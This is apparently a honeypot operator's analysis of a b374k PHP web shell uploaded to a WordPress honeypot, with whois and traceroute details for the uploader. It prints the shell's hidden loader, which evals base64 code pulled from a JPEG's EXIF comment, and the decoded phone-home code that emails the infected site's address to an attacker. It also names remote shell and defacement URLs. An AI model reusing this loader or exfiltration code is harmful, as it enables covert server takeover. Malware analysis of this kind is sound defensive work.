Crouching JPEG, Hidden PH2
b374k shell 3.2.3 - 2018-03-02
An instance of b374k web shell, with a strange code retrieval from EXIF data in a JPG image from googleusercontent.com
Is this the original b374k shell?
Another analysis of this particular piece of malware.
Downloaded as a plain file ("application/octet-stream") named b374k_3.2.3.php
using the "Upload" tab of WordPress' plugin installer.
Bad luck, this was part of a WordPress honey pot,
so no plugins got installed.
120.188.36.204 has domain name 120-188-36-204.resources.indosat.com
120-188-36-204.resources.indosat.com has no DNS name.
inetnum: 120.188.36.0 - 120.188.36.255
netname: GGSN-3G-ISAT-ID
descr: GGSN 3G
descr: INDOSAT's 3g Broadband Customer
descr: Jakarta
country: ID
admin-c: IH151-AP
tech-c: IH151-AP
remarks: For abuse and spam report please contact abuse@indosat.com
status: ALLOCATED NON-PORTABLE
mnt-by: MAINT-ID-INDOSAT-INP
last-modified: 2009-06-10T02:12:04Z
source: APNIC
person: INDOSAT INP Hostmaster
nic-hdl: IH151-AP
e-mail: hostmaster@indosatooredoo.com
address: PT Indosat
address: Jl. Medan Merdeka Barat 21
address: Jakarta Pusat
phone: +62-21-30072088
+62-8557897897
fax-no: +62-21-30001073
country: ID
mnt-by: MAINT-ID-INDOSAT-INP
last-modified: 2015-11-30T04:59:02Z
source: APNIC
traceroute to 120.188.36.204 (120.188.36.204), 30 hops max, 60 byte packets
1 129-45-246-162.versonetworks.net (162.246.45.129) 28.207 ms 28.412 ms 28.374 ms
2 10.100.100.1 (10.100.100.1) 28.382 ms 28.351 ms 28.318 ms
3 v231.core1.den1.he.net (216.66.73.25) 28.320 ms 28.288 ms 28.274 ms
4 100ge3-2.core1.sjc2.he.net (184.105.64.69) 62.876 ms 62.874 ms 62.841 ms
5 10ge4-5.core1.pao1.he.net (72.52.92.69) 62.829 ms 100ge1-1.core1.pao1.he.net (72.52.92.158) 62.817 ms 62.799 ms
6 eqix-sv8-ptindosat.com (198.32.176.167) 62.762 ms 64.298 ms 49.137 ms
7 114-0-78-103.resources.indosat.com (114.0.78.103) 214.498 ms 214.476 ms 214.407 ms
8 114-0-78-37.resources.indosat.com (114.0.78.37) 214.435 ms 214.416 ms 214.371 ms
9 114-0-78-205.resources.indosat.com (114.0.78.205) 224.314 ms 224.299 ms 224.264 ms
10 114-4-19-102.resources.indosat.com (114.4.19.102) 224.222 ms 224.167 ms 224.158 ms
11 * * *
12 114-0-51-24.resources.indosat.com (114.0.51.24) 230.087 ms 232.118 ms 232.067 ms
13 * * *
..l
30 * * *
Downloaded file b374k_3.2.3.php
is not obfuscated in any form.
It's just PHP source.
It does have code that should make any reader suspcious:
$BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
PHP program exif_reader
retrieves that URL: php exif_reader > exif_data
I did also download the JPG file from which that data derives. It's right here:
The UserComment
element of the EXIF data does have a 2800 byte string in it.
Invoking php usercomment.php > usercomment.out
lets us see what that string
has encoded, which is a small decoder.
Invoking php uc2.php > uc3.php
gives us another layer of obfuscationl
Invoking php uc3.php > uc4.php
gives us what's probably the original PHP code.
The PHP code in pacman.jpg
appears to execute every time b374k.php
get accessed.
The first time this hidden PHP code executes it does a phone-home:
$to = "syedich@yahoo.com";
$subject = $_SERVER['SERVER_NAME'];
$header = "From: Mastah <jancok@matamucok.com>";
$message = "Exploit : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'];
mail($to, $subject, $message, $header);
$m = fopen(".db", "w") or die (" ");
$txt = "";
fwrite($m, $txt);
fclose($m);
Creation of a file named .db
allows the hidden code to not phone home more than once.
The hidden code appears to be a small, crude web shell that only does things
if certain HTTP GET parameters are set.
The hidden code can upload a file to the infected Wordpess site if "0upload" is set.
The hidden code can download two files: https://sites.google.com/site/bhshll123/bh.txt
if HTTP GET parameter "0shell" is set,
and http://pastebin.com/raw/6JA72K8m
if HTTP GET parameter "0deface" is set.
Those parameter names suggest mischief! I also think the hidden code will execute
before the b374k code does. You have to know about the hidden code -
it's a layer of obscurity on top of the covert b374k shell download.
bh.txt
contains some CSS and HTML that look like legitmate Google code.
I'm not sure what's going on with it:
it's totally convoluted,
and I'm not a JavaScipt expert.
The pastebin URL gives me a 404 - not found.
The domain name "matamucok.com" does not appear in DNS
or in whois
information.
As a "from" address I suppose lack of an IP address doesn't matter.
"jancok@matamucok.com" doesn't show up in google as such,
but apparently that's an Indonesian name.
"syedich@yahoo.com" does appear in google,
mostly in people mad about this particular web shell.